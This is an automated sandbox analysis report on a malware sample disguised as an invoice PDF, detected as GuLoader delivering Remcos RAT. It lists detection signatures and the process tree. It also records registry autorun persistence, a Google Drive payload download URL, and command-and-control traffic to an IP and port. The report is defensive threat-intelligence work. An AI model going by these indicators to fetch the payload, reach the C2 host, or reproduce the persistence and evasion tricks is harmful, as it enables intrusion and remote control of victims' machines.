Edit tour

Windows Analysis Report
ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Overview

General Information

Sample name:	ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
Analysis ID:	1640058
MD5:	9117fe086de9bb304d000560408106e5
SHA1:	a5af5ed15a0e7f96ceba428a1bf3822d81a95f6f
SHA256:	2dce3c887b0b2f9bb9f433c429924dbb8b05bc67318ad05b3a739151d67e363d
Tags:	exeuser-threatcat_ch
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Detected Remcos RAT

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Remcos RAT

Creates autostart registry keys with suspicious names

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Sample has a suspicious name (potential lure to open the executable)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

JA3 SSL client fingerprint seen in connection with other malware

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

ORIGINAL INVOICE COAU7230734290 pdf.bat.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe" MD5: 9117FE086DE9BB304D000560408106E5)

ORIGINAL INVOICE COAU7230734290 pdf.bat.exe (PID: 6128 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe" MD5: 9117FE086DE9BB304D000560408106E5)

remcos.exe (PID: 4156 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9117FE086DE9BB304D000560408106E5)

remcos.exe (PID: 7224 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9117FE086DE9BB304D000560408106E5)

remcos.exe (PID: 7404 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9117FE086DE9BB304D000560408106E5)

remcos.exe (PID: 7944 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9117FE086DE9BB304D000560408106E5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.1673415355.00000000049E5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.1534421307.00000000067BC000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000A.00000002.2759956391.00000000066BC000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe PID: 6128	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, ProcessId: 6128, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-4U257D

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, ProcessId: 6128, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-4U257D

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-16T22:28:17.776462+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49735	196.251.80.28	2404	TCP
2025-03-16T22:30:51.841024+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49733	196.251.80.28	2404	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-16T22:28:59.370145+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49727	142.250.185.78	443	TCP
2025-03-16T22:30:21.635183+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49730	142.250.185.206	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Remcos\remcos.exe	ReversingLabs: Detection: 22%
Source: C:\ProgramData\Remcos\remcos.exe	Virustotal: Detection: 23%			Perma Link

Multi AV Scanner detection for submitted file

Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Virustotal: Detection: 23%			Perma Link
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	ReversingLabs: Detection: 22%

Yara detected Remcos RAT

Source: Yara match	File source: 00000009.00000002.1673415355.00000000049E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe PID: 6128, type: MEMORYSTR

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49728 version: TLS 1.2

Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 0_2_00406354 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00406354
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 0_2_00406214 FindFirstFileA,FindClose,	0_2_00406214
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 0_2_004029DA FindFirstFileA,	0_2_004029DA
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 9_2_00406354 DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	9_2_00406354
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 9_2_00406214 FindFirstFileA,FindClose,	9_2_00406214
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 9_2_004029DA FindFirstFileA,	9_2_004029DA
Source: C:\ProgramData\Remcos\remcos.exe	Code function: 14_2_00406354 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	14_2_00406354
Source: C:\ProgramData\Remcos\remcos.exe	Code function: 14_2_00406214 FindFirstFileA,FindClose,	14_2_00406214
Source: C:\ProgramData\Remcos\remcos.exe	Code function: 14_2_004029DA FindFirstFileA,	14_2_004029DA

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49733 -> 196.251.80.28:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49735 -> 196.251.80.28:2404

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49727 -> 142.250.185.78:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49730 -> 142.250.185.206:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1fWgBdsqFCpAAZN81IQJKc_PEbkpu8LYG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1fWgBdsqFCpAAZN81IQJKc_PEbkpu8LYG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1fWgBdsqFCpAAZN81IQJKc_PEbkpu8LYG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1fWgBdsqFCpAAZN81IQJKc_PEbkpu8LYG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: remcos.exe, remcos.exe, 0000000E.00000002.2793249084.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, remcos.exe, 0000000E.00000000.2007675389.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, remcos.exe, 0000000F.00000002.2793047460.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, remcos.exe, 0000000F.00000000.2256528109.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, remcos.exe.9.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, remcos.exe.9.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1592752203.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.00000000049A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/S
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.00000000049A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/k
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.00000000049E5000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1677680771.0000000006500000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1fWgBdsqFCpAAZN81IQJKc_PEbkpu8LYG
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.00000000049E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1fWgBdsqFCpAAZN81IQJKc_PEbkpu8LYGJP
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1631972221.0000000004A5A000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1652528178.0000000004A5A000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.00000000049E5000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1652528178.0000000004A23000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.0000000004A23000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1592752203.0000000004A23000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1631972221.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1fWgBdsqFCpAAZN81IQJKc_PEbkpu8LYG&export=download
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1631972221.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1fWgBdsqFCpAAZN81IQJKc_PEbkpu8LYG&export=downloadFB
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1631972221.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1fWgBdsqFCpAAZN81IQJKc_PEbkpu8LYG&export=downloadn
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1631972221.0000000004A5A000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1652528178.0000000004A5A000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/f)
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1592752203.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1592752203.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1592752203.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1592752203.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1592752203.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727

Source: unknown	HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49728 version: TLS 1.2

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Code function: 0_2_00404881 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,LdrInitializeThunk,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,

0_2_00404881

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000009.00000002.1673415355.00000000049E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe PID: 6128, type: MEMORYSTR

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Sample has a suspicious name (potential lure to open the executable)

Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Static file information: Suspicious name

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 0_2_004034CE EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	0_2_004034CE
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 9_2_00403519 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	9_2_00403519
Source: C:\ProgramData\Remcos\remcos.exe	Code function: 14_2_004034CE EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	14_2_004034CE

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 0_2_0040417B	0_2_0040417B
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 0_2_6EB82288	0_2_6EB82288
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 9_2_0040417B	9_2_0040417B
Source: C:\ProgramData\Remcos\remcos.exe	Code function: 14_2_0040417B	14_2_0040417B

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nsd1A26.tmp\System.dll C85142F86E1EC02F7EF8D5BA31B22031DE3DE9A16BCE519D5482B824AFB277EB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nsg5579.tmp\System.dll C85142F86E1EC02F7EF8D5BA31B22031DE3DE9A16BCE519D5482B824AFB277EB

Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000000.00000002.1507179105.00000000007B7000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameklummer lothario.exe4 vs ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1654055666.00000000007B7000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameklummer lothario.exe4 vs ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.0000000004A7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameklum vs ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Binary or memory string: OriginalFilenameklummer lothario.exe4 vs ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/13@4/2

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 0_2_004034CE EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	0_2_004034CE
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 9_2_00403519 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	9_2_00403519
Source: C:\ProgramData\Remcos\remcos.exe	Code function: 14_2_004034CE EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	14_2_004034CE

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Code function: 0_2_00403DF4 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,EnableWindow,

0_2_00403DF4

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Code function: 0_2_00402300 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,

0_2_00402300

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

File created: C:\Users\user\Videos\Kolorer131

Jump to behavior

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-4U257D

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

File created: C:\Users\user\AppData\Local\Temp\nss4EC6.tmp

Jump to behavior

Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Virustotal: Detection: 23%
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	ReversingLabs: Detection: 22%

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

File read: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: unknown	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: unknown	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: C:\ProgramData\Remcos\remcos.exe	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"	Jump to behavior
